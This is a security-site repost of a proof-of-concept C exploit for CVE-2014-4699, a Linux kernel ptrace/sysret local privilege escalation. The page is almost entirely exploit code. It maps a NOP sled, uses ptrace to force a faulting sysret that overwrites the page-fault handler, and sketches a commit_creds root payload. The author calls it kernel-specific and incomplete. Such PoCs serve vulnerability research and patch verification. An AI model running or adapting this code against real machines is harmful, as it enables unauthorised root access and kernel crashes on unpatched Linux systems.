首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel ptrace/sysret - Local Privilege Escalation
来源:vnik@hashcrack.org 作者:Nikolenko 发布时间:2014-07-22  
/**
 * CVE-2014-4699 ptrace/sysret PoC
 * by Vitaly Nikolenko
 * vnik@hashcrack.org
 *
 * > gcc -O2 poc_v0.c
 *
 * This code is kernel specific. On Ubuntu 12.04.0 LTS (3.2.0-23-generic), the
 * following will trigger the #GP in sysret and overwrite the #PF handler so we
 * can land to our NOP sled mapped at 0x80000000.
 * However, once landed, the IDT will be trashed. We can either attempt to
 * restore it (then escalate privileges and execute our shellcode) or find
 * something else to overwrite that would transfer exec flow to our controlled
 * user-space address. Since 3.10.something, IDT is read-only anyway. If you
 * have any ideas, let me know.
 */
   
#include <stdio.h>
#include <stdint.h>
#include <assert.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <unistd.h>
#include <sys/mman.h>
#include <errno.h>
  
#define SIZE  0x10000000
  
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);
  
unsigned long __user_cs;
unsigned long __user_ss;
unsigned long __user_rflags;
  
void __attribute__((regparm(3))) payload() {
    uint32_t *fixptr = (void*)0xffffffff81dd70e8;
    // restore the #PF handler
    *fixptr = -1;
    //commit_creds_fn commit_creds = (commit_creds_fn)0xffffffff81091630;
    //prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)0xffffffff810918e0;
    //commit_creds(prepare_kernel_cred((uint64_t)NULL));
  
    //__asm__ volatile ("swapgs\n\t"
    //        "...");
}
  
int main() {
    struct user_regs_struct regs;
    uint8_t *trampoline, *tmp;
    int status;
  
    struct {
        uint16_t limit;
        uint64_t addr;
    } __attribute__((packed)) idt;
  
        // MAP_POPULATE so we don't trigger extra #PF
    trampoline = mmap(0x80000000, SIZE, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0);
    assert(trampoline == 0x80000000);
    memset(trampoline, 0x90, SIZE); 
        tmp = trampoline;
        tmp += SIZE-1024;
        memcpy(tmp, &payload, 1024);
    memcpy(tmp-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);
  
    pid_t chld;
  
        if ((chld = fork()) < 0) {
        perror("fork");
        exit(1);
    }
      
    if (chld == 0) { 
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) {
            perror("PTRACE_TRACEME");
            exit(1);
        }
        raise(SIGSTOP);
        fork();
        return 0;
    }
  
    asm volatile("sidt %0" : "=m" (idt));
    printf("IDT addr = 0x%lx\n", idt.addr);
  
    waitpid(chld, &status, 0);
  
    ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK); 
  
    ptrace(PTRACE_CONT, chld, 0, 0);
  
    waitpid(chld, &status, 0); 
  
        ptrace(PTRACE_GETREGS, chld, NULL, &regs);
    regs.rdi = 0x0000000000000000;
    regs.rip = 0x8fffffffffffffff;
    regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78;
  
    // attempt to restore the IDT
    regs.rdi = 0x0000000000000000;
    regs.rsi = 0x81658e000010cbd0;
    regs.rdx = 0x00000000ffffffff;
    regs.rcx = 0x81658e000010cba0;
    regs.rax = 0x00000000ffffffff;
    regs.r8  = 0x81658e010010cb00;
    regs.r9  = 0x00000000ffffffff;
    regs.r10 = 0x81668e0000106b10;
    regs.r11 = 0x00000000ffffffff;
    regs.rbx = 0x81668e0000106ac0;
    regs.rbp = 0x00000000ffffffff;
    regs.r12 = 0x81668e0000106ac0;
    regs.r13 = 0x00000000ffffffff;
    regs.r14 = 0x81668e0200106a90;
    regs.r15 = 0x00000000ffffffff;
  
        ptrace(PTRACE_SETREGS, chld, NULL, &regs);
  
    ptrace(PTRACE_CONT, chld, 0, 0);
  
    ptrace(PTRACE_DETACH, chld, 0, 0);
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MTS MBlaze Ultra Wi-Fi / ZTE A
·vBulletin 5.1.2 SQL Injection
·Raritan PowerIQ 4.1.0 - SQL In
·Microsoft XP SP3 BthPan.sys Ar
·IBM GCM16/32 1.20.0.22575 - Mu
·Microsoft XP SP3 MQAC.sys Arbi
·OpenVAS Manager 4.0 - Authenti
·Kolibri WebServer 2.0 - GET Re
·ACME micro_httpd - Denial of S
·DjVuLibre <= 3.5.25.3 - Out of
·NTP Amplification Denial Of Se
·Apache 2.4.x mod_proxy Denial
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved